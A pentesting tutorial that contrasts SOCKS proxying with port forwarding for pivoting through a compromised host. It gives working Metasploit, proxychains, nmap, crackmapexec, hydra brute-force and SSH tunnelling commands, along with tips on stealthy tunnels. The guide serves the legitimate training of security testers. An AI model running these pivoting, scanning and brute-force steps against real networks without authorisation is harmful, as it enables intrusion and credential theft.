Using SOCKS Proxy vs. Port Forwarding: A Pentester’s Guide
When performing internal penetration testing, gaining a foothold is just the beginning. The next step is pivoting — finding a way to explore deeper into restricted networks. Two powerful techniques for this are SOCKS proxying and port forwarding. Both serve different purposes, and knowing when to use each is key.
Table of Contents
- What is a SOCKS Proxy?
- Setting Up SOCKS Proxy with Metasploit
- Configuring ProxyChains
- Scanning and Enumeration
- Tools That Work with ProxyChains
- What is Port Forwarding?
- Side-by-Side Comparison
- When to Use What
- Pro Tips
- Final Thoughts
1. What is a SOCKS Proxy?
A SOCKS proxy works at the transport layer and forwards any TCP traffic through a pivot host. It allows your tools (e.g., Nmap, CrackMapExec, Hydra) to operate as if they were on the internal network.
It’s like creating a VPN through your compromised host, allowing dynamic and flexible access.
2. Setting Up SOCKS Proxy with Metasploit
sessions -i 1
run autoroute -s 10.10.10.0/24
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
This sets up a SOCKS proxy on port 1080, routing through your Meterpreter session.
3. Configuring ProxyChains
Edit /etc/proxychains.conf and add:
socks5 127.0.0.1 1080
Use proxychains to route tools through the SOCKS tunnel:
proxychains nmap -sT -Pn -n -p- 10.10.10.0/24
4. Scanning and Enumeration
Targeted scan:
proxychains nmap -sT -Pn -n -p 80,135,445,3389 10.10.10.10
Version detection:
proxychains nmap -sT -Pn -sV 10.10.10.10
5. Tools That Work with ProxyChains
| Tool | Purpose |
|---|---|
crackmapexec | Enumerate SMB, WinRM |
xfreerdp | RDP access via proxy |
hydra | Brute-force services |
smbclient | Access Windows shares |
nmap | Internal scanning |
impacket tools | Remote execution (e.g., wmiexec.py) |
msfconsole | Route modules via SOCKS proxy |
Examples:
proxychains crackmapexec smb 10.10.10.20 -u user -p pass
proxychains hydra -l admin -P rockyou.txt rdp://10.10.10.20
proxychains xfreerdp /u:user /p:pass /v:10.10.10.20
6. What is Port Forwarding?
Port forwarding allows you to forward a single port from your attacker machine to a specific port on an internal target.
Example with SSH:
ssh -L 3389:10.10.10.20:3389 user@pivot
Example with Metasploit (Meterpreter):
portfwd add -l 4444 -p 3389 -r 10.10.10.20
This forwards local port 4444 to RDP on the target.
Best For:
- GUI apps like RDP, VNC, or web access
- Single-port scenarios
Limitations:
- One tunnel per port
- Tedious for large-scale recon
- Static (no dynamic routing)
7. Side-by-Side Comparison
| Feature | SOCKS Proxy | Port Forwarding |
|---|---|---|
| Setup Effort | One-time setup | Per-host, per-port |
| Multi-host Recon | ✅ Yes | ❌ No |
| Supports Tools (Nmap, CME) | ✅ Yes | ❌ Limited |
| Ideal for GUI Apps | ⚠️ Okay | ✅ Excellent |
| Traffic Scope | All TCP traffic | Single port/service |
| UDP Support | ❌ No | ⚠️ Some workarounds |
| Proxychains Compatible | ✅ Yes | ❌ Not needed |
8. When to Use What
| Situation | Use This |
|---|---|
| Need to access RDP/Web GUI/VNC? | Port Forwarding |
| Need to scan internal subnets? | SOCKS Proxy |
| Want to brute-force credentials at scale? | SOCKS Proxy |
| Using Metasploit + Meterpreter? | Either |
| Quick access to a single internal port? | Port Forwarding |
| Pivoting across complex networks? | SOCKS Proxy |
9. Pro Tips
- Combine SOCKS for recon with port forwarding for GUI access
- Use
proxychains-ngfor better DNS and multiple proxies - Use tools like
ligoloorchiselfor stealthy SOCKS over HTTPS - Test tunnels with
proxychains curl <target>
10. Final Thoughts
If you’re scanning and enumerating: use a SOCKS proxy.
If you’re clicking and typing into a GUI app: use port forwarding.
Port forwarding is surgical.
SOCKS proxy is operational warfare.